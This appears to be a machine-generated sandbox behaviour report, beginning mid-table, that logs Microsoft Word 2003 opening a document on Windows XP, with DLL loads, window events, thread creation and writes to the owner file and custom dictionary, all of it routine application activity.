C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\fontsub.dll write and read and execute commit 32E0000 81920 own pid execute success or wait 1
C:\WINDOWS\system32\fontsub.dll query and write and read and execute image 69310000 94208 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll write and read and execute commit 2CB0000 200704 own pid execute success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll query and read commit 2CB0000 200704 own pid readonly success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll write and read and execute commit 2CB0000 200704 own pid execute success or wait 1
C:\Program Files\Common Files\System\ado\msadox.dll query and read commit 2CB0000 200704 own pid readonly success or wait 1
C:\Program Files\Messenger\msmsgs.exe write and read and execute commit 2EE0000 1695744 own pid execute success or wait 1
C:\Program Files\Messenger\msmsgs.exe query and read commit 2EE0000 1695744 own pid readonly success or wait 1
C:\Program Files\Messenger\msmsgs.exe write and read and execute commit 2EE0000 1695744 own pid execute success or wait 1
C:\Program Files\Messenger\msmsgs.exe query and read commit 2EE0000 1695744 own pid readonly success or wait 1
Section loaded by Program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL write and read and execute commit 860000 12259328 own pid execute success or wait 1 30003071
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and write and read and execute image 30C90000 12304384 own pid read write success or wait 1 30003071
\BaseNamedObjects\ShimSharedMemory write unknown 870000 57344 own pid read write success or wait 1 30003071
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit A40000 1056768 own pid execute success or wait 1 30029E78
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 30029E78
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit A40000 4096 own pid execute success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest query and read commit A40000 4096 own pid readonly success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest read commit A40000 4096 own pid readonly success or wait 1 30029E78
\BaseNamedObjects\PrimaryWord11SharedMemoryArea read unknown unknown unknown unknown unknown object name not found 1 3002AA90
\BaseNamedObjects\PrimaryWord11SharedMemoryArea query and write and read commit AA0000 4096 own pid read write success or wait 1 3002AAA7
\KnownDlls\MSIMG32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 30003601
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 30003601
C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL write and read and execute commit 26D0000 3166208 own pid execute success or wait 1 301C8944
C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL query and write and read and execute image 3F100000 3166208 own pid read write success or wait 1 301C8944

Registry Activites
Key Path Completion Count Source Address Symbol
Key Path Completion Count Source Address Symbol
Key Path Key Value Name Completion Count Source Address Symbol
Key Path Name Type Data Completion Count Source Address Symbol
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
Key Value Queried
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion CommonFilesDir success or wait 1 3000303D RegQueryValueExW

Mutex Activites
Name Completion Count Source Address Symbol

Process Activites
Process Queried
PID Process info class Completion Count Source Address Symbol
900 QuotaLimits success or wait 10 30007F87 GlobalMemoryStatusEx
900 VmCounters success or wait 10 30007F87 GlobalMemoryStatusEx

Thread Activites
Thread Created
TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
1328 900 7C8106F9 30072A95 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30072974 CreateThread
1780 900 7C8106F9 30072A95 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30072974 CreateThread
Thread Execution Resumed
TID PID Path Completion Count Source Address Symbol
1328 900 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30072996 ResumeThread
1780 900 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 1 30072996 ResumeThread
TID Delay Completion Count Source Address Symbol
TID PID Completion Count Source Address Symbol

Memory Activites
PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Protection Completion Count Source Address Symbol
Memory Protection Changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
900 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 30B81000 1000 page readonly page read and write success or wait 1 30001C81 VirtualProtect
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:42 0 0 0
15:20:43 2 7 2
15:20:44 3 10 3
15:20:45 3 11 3
15:20:46 4 12 4
15:20:47 7 17 7
15:20:48 7 17 7
15:20:49 7 17 7
15:20:54 7 17 7
15:21:44 7 17 7

System Activites
System info class Completion Count Source Address Symbol

Timing Activites
Time Completion Count Source Address Symbol

Windows UI Activites
Window Created
Window name Class name HWND Completion Count Source Address Symbol
OpusApp OpusApp 6014A success 1 30029D25 CreateWindowExW
_WwC _WwC 50132 success 1 30054A32 CreateWindowExA
_WwF _WwF 900F4 success 1 30054A32 CreateWindowExA
_WwB _WwB 600F8 success 1 30029D25 CreateWindowExW
_WwB _WwB 500F0 success 1 30029D25 CreateWindowExW
_WwG _WwG 500EE success 1 30029D25 CreateWindowExW
6.0.2600.6028!ScrollBar SCROLLBAR 500EA success 1 30054A32 CreateWindowExA
_WwC _WwC 500E8 success 1 30054A32 CreateWindowExA
6.0.2600.6028!ScrollBar SCROLLBAR 500E0 success 1 30054A32 CreateWindowExA
_WwC _WwC A0058 success 1 30054A32 CreateWindowExA
_WwC _WwC 6012C success 1 30054A32 CreateWindowExA
_WwC _WwC 500D6 success 1 30054A32 CreateWindowExA
Window UIs Enumerated
Window name Class name HWND of window Completion Count Source Address Symbol
NULL MSOBALLOON 0 error 1 30063D12 FindWindowA
NULL MsoHelp10 0 error 1 30063D27 FindWindowA
NULL AgentAnim 0 error 1 30063D40 FindWindowA
Window UI Destroyed
HWND Completion Count Source Address Symbol
600F8 success 1 3067CF46 NtUserDestroyWindow
Window UIs Enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address Symbol
0 0 false 5D4 6014A, 6012E, 500F2, 8013C, 1, 1, 10078, 10084, 10088, 1, 88000000, 88000000, 88000000, 88000000, 88000000 success or wait 1 3067D66A KiUserApcDispatcher
Information about Foreground Window Queried
HWND Completion Count Source Address Symbol
1008C success 1 300037BB NtUserGetForegroundWindow
6014A success 24 30063CEF NtUserGetForegroundWindow
Window UI Shown
HWND Command Completion Count Source Address Symbol
50132 show normal error 1 3005545D NtUserShowWindow
6014A show maximized error 1 3002CCA5 NtUserShowWindow
50132 show normal success 4 3005545D NtUserShowWindow
500EA show normal error 1 300747CC NtUserShowWindow
500E0 show normal error 1 300747CC NtUserShowWindow
500D8 show normal error 1 300747CC NtUserShowWindow
500E6 show normal error 1 300747CC NtUserShowWindow
6012C show normal error 1 300747CC NtUserShowWindow
500D6 show normal error 1 300747CC NtUserShowWindow
500EA show normal success 3 300747CC NtUserShowWindow
500E0 show normal success 3 300747CC NtUserShowWindow
500D8 show normal success 3 300747CC NtUserShowWindow
500E6 show normal success 3 300747CC NtUserShowWindow
6012C show normal success 3 300747CC NtUserShowWindow
500D6 show normal success 3 300747CC NtUserShowWindow
500F0 show normal error 1 3006A9F5 NtUserShowWindow
500EE show normal error 1 30074BAC NtUserShowWindow
6012C show success 1 30074BC1 NtUserShowWindow
500D6 show success 1 30074BD6 NtUserShowWindow
Window UI Placement Queried
HWND Command Completion Count Source Address Symbol
6014A show maximized success 1 3006ADB8 NtUserGetWindowPlacement
Message Posted to Windows UI
HWND Message LParam WParam Completion Count Source Address Symbol
6014A 45F 0 0 success 1 30003B2E PostMessageA
A013E DDE_ACK 393464 1878224 success 1 3067D00E PostMessageA
A013E DDE_TERMINATE 393464 0 success 1 3067D00E PostMessageA
TID Message LParam WParam Completion Count Source Address Symbol
Window UIs Hook Set
Module Thread id Hook code Completion Count Source Address Symbol
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 1492 FFFFFFFF success 1 30007EF6 SetWindowsHookExW

Process Token Activites
Status Privilege Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Memory attributes changed PID: 900 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Base: 30B81000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 750261376
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion Name: CommonFilesDir success or wait 750262109
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: write and read and execute Type: commit Baseaddress: 860000 Size: 12259328 Protection: execute Mapped to pid: own pid success or wait 750263674
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: query and write and read and execute Type: image Baseaddress: 30C90000 Size: 12304384 Protection: read write Mapped to pid: own pid success or wait 750269836
Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 750325362
Foreground Window Got HWND: 1008C success 750394899
Process information queried PID: 900 Info Class: QuotaLimits success or wait 750505192
Process information queried PID: 900 Info Class: VmCounters success or wait 750505387
Process information queried PID: 900 Info Class: QuotaLimits success or wait 750614181
Process information queried PID: 900 Info Class: VmCounters success or wait 750614384
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: A40000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 750725305
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 750729608
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 750739389
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: A40000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 750759449
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: A40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 750762321
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: A40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 750768490
Window created Window Name: OpusApp Class Name: OpusApp HWND: 6014A success 750812220
Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: read Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 750942875
Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: query and write and read Type: commit Baseaddress: AA0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 750943999
Process information queried PID: 900 Info Class: QuotaLimits success or wait 750980572
Process information queried PID: 900 Info Class: VmCounters success or wait 750980761
Windows hook set Module: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 1492 Hook ID: FFFFFFFF success 751090439
Process information queried PID: 900 Info Class: QuotaLimits success or wait 751392036
Process information queried PID: 900 Info Class: VmCounters success or wait 751395394
Process information queried PID: 900 Info Class: QuotaLimits success or wait 751413140
Process information queried PID: 900 Info Class: VmCounters success or wait 751413352
Window created Window Name: _WwC Class Name: _WwC HWND: 50132 success 751458139
Window shown HWND: 50132 CMD: show normal error 751458688
Window created Window Name: _WwF Class Name: _WwF HWND: 900F4 success 751749706
Window shown HWND: 6014A CMD: show maximized error 751780007
Foreground Window Got HWND: 6014A success 751794202
Windows found Window Name: NULL Class Name: MSOBALLOON HWND: 0 error 751794439
Windows found Window Name: NULL Class Name: MsoHelp10 HWND: 0 error 751794651
Windows found Window Name: NULL Class Name: AgentAnim HWND: 0 error 751794859
Foreground Window Got HWND: 6014A success 751833793
Foreground Window Got HWND: 6014A success 751848918
Foreground Window Got HWND: 6014A success 751866017
Window shown HWND: 50132 CMD: show normal success 751940171
Window shown HWND: 50132 CMD: show normal success 752120675
Message posted HWND: 6014A Message: 45F WParam: 0 LParam: 0 success 752147007
Foreground Window Got HWND: 6014A success 752151848
Window created Window Name: _WwB Class Name: _WwB HWND: 600F8 success 753084232
Foreground Window Got HWND: 6014A success 753229825
Foreground Window Got HWND: 6014A success 753230775
Process information queried PID: 900 Info Class: QuotaLimits success or wait 753647617
Process information queried PID: 900 Info Class: VmCounters success or wait 753647828
Process information queried PID: 900 Info Class: QuotaLimits success or wait 753666921
Process information queried PID: 900 Info Class: VmCounters success or wait 753667135
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~$hone 5.doc Offset: unknown Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 753680920
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~$hone 5.doc Offset: unknown Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 F8 00 06 00 3E 01 0A 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF 02 00 00 00 00 00 00 00 74 47 0C 00 FF FF FF FF FF FF 0C 00 5C 00 00 00 03 00 00 00 04 00 00 00 08 00 00 00 04 00 00 00 success or wait 753682093
Window placement got HWND: 6014A CMD: show maximized success 753768396
Window created Window Name: _WwB Class Name: _WwB HWND: 500F0 success 753772507
Foreground Window Got HWND: 6014A success 753851850
Window created Window Name: _WwG Class Name: _WwG HWND: 500EE success 753854469
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 500EA success 753857889
Window created Window Name: _WwC Class Name: _WwC HWND: 500E8 success 753858691
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 500E0 success 753885721
Window created Window Name: _WwC Class Name: _WwC HWND: A0058 success 753915617
Window created Window Name: _WwC Class Name: _WwC HWND: 6012C success 753916155
Window created Window Name: _WwC Class Name: _WwC HWND: 500D6 success 753917152
Window shown HWND: 500EA CMD: show normal error 754524191
Window shown HWND: 500E0 CMD: show normal error 754524370
Window shown HWND: 500D8 CMD: show normal error 754524534
Window shown HWND: 500E6 CMD: show normal error 754525286
Window shown HWND: 6012C CMD: show normal error 754525944
Window shown HWND: 500D6 CMD: show normal error 754526887
Window shown HWND: 500EA CMD: show normal success 754538069
Window shown HWND: 500E0 CMD: show normal success 754538228
Window shown HWND: 500D8 CMD: show normal success 754538386
Window shown HWND: 500E6 CMD: show normal success 754539189
Window shown HWND: 6012C CMD: show normal success 754539699
Window shown HWND: 500D6 CMD: show normal success 754548016
Window shown HWND: 500EA CMD: show normal success 754549802
Window shown HWND: 500E0 CMD: show normal success 754549961
Window shown HWND: 500D8 CMD: show normal success 754550118
Window shown HWND: 500E6 CMD: show normal success 754550531
Window shown HWND: 6012C CMD: show normal success 754550879
Window shown HWND: 500D6 CMD: show normal success 754551036
Window shown HWND: 50132 CMD: show normal success 754551212
Window shown HWND: 500F0 CMD: show normal error 754551372
Window shown HWND: 500EE CMD: show normal error 755036978
Window shown HWND: 6012C CMD: show success 755037750
Window shown HWND: 500D6 CMD: show success 755037910
Window shown HWND: 50132 CMD: show normal success 755038675
Window shown HWND: 500EA CMD: show normal success 755038839
Window shown HWND: 500E0 CMD: show normal success 755049037
Window shown HWND: 500D8 CMD: show normal success 755050257
Window shown HWND: 500E6 CMD: show normal success 755051222
Window shown HWND: 6012C CMD: show normal success 755051729
Window shown HWND: 500D6 CMD: show normal success 755051889
Message posted HWND: A013E Message: DDE_ACK WParam: 393464 LParam: 1878224 success 755255730
Foreground Window Got HWND: 6014A success 755304980
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 755316242
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 755317843
Message posted HWND: A013E Message: DDE_TERMINATE WParam: 393464 LParam: 0 success 755347431
Window destroyed HWND: 600F8 success 755351973
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 5D4 HWNDs: 6014A, 6012E, 500F2, 8013C, 1, 1, 10078, 10084, 10088, 1, 88000000, 88000000, 88000000, 88000000, 88000000 success or wait 755352123
Process information queried PID: 900 Info Class: QuotaLimits success or wait 758139432
Process information queried PID: 900 Info Class: VmCounters success or wait 758139638
Foreground Window Got HWND: 6014A success 758207605
Foreground Window Got HWND: 6014A success 758207760
Foreground Window Got HWND: 6014A success 758208016
Foreground Window Got HWND: 6014A success 758208166
Foreground Window Got HWND: 6014A success 758208401
Foreground Window Got HWND: 6014A success 758208549
Foreground Window Got HWND: 6014A success 758208784
Foreground Window Got HWND: 6014A success 758208931
Foreground Window Got HWND: 6014A success 758209166
Foreground Window Got HWND: 6014A success 758209314
Foreground Window Got HWND: 6014A success 758219801
Foreground Window Got HWND: 6014A success 758219951
Foreground Window Got HWND: 6014A success 758220189
Foreground Window Got HWND: 6014A success 758220338
Thread created PID: 900 TID: 1328 EIP: 7C8106F9 EAX: 30072A95 Imagepath: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 758868385
Thread resumed TID: 1328 PID: 900 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 758869169
File other op Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC New path: Disposition: PositionInformation Data : Offset: 0 success or wait 763625296
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: unknown Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 763630404
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: unknown Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 20 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 03 00 01 00 0C 00 5C 00 00 00 03 00 00 00 04 00 00 00 08 00 00 00 04 00 00 00 success or wait 763631655
File other op Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC New path: Disposition: PositionInformation Data : Offset: 0 success or wait 763638966
File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC New path: Disposition: Data : success or wait 763643082
File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC New path: Disposition: Data : success or wait 763648536
File moved Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~WRI0002 New path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC Disposition: Data : success or wait 763651573
File other op Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC New path: Disposition: PositionInformation Data : Offset: 0 success or wait 763677595
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: unknown Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 763681754
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: unknown Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 20 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 03 00 01 00 0C 00 5C 00 00 00 03 00 00 00 04 00 00 00 08 00 00 00 04 00 00 00 success or wait 763682872
File other op Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC New path: Disposition: PositionInformation Data : Offset: 0 success or wait 763684313
File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC New path: Disposition: Data : success or wait 763689022
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL Access: write and read and execute Type: commit Baseaddress: 26D0000 Size: 3166208 Protection: execute Mapped to pid: own pid success or wait 764865279
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL Access: query and write and read and execute Type: image Baseaddress: 3F100000 Size: 3166208 Protection: read write Mapped to pid: own pid success or wait 764869274
Process information queried PID: 900 Info Class: QuotaLimits success or wait 764991698
Process information queried PID: 900 Info Class: VmCounters success or wait 764991901
Thread created PID: 900 TID: 1780 EIP: 7C8106F9 EAX: 30072A95 Imagepath: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 770722244
Thread resumed TID: 1780 PID: 900 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 770723118
Process information queried PID: 900 Info Class: QuotaLimits success or wait 791430759
Process information queried PID: 900 Info Class: VmCounters success or wait 791430952
Foreground Window Got HWND: 6014A success 965806601